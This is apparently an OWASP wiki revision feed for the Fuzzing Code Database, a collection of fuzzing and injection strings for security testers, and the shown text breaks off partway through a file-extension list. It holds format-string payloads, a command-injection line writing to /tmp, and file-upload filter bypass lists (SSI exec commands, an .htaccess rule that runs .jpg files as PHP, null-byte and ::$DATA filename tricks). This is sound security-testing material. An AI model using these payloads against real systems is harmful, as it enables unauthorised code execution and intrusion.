%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80062</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80062"/>
				<updated>2010-03-17T20:40:27Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* File Upload Filter Bypass   (Update: 17 March 2009 - notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 - notes ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htacces in an upload folder on Apache httpd, try setting .jpg to executable&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&lt;br /&gt;
# Commonly writable directories&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== (Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863) ===&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
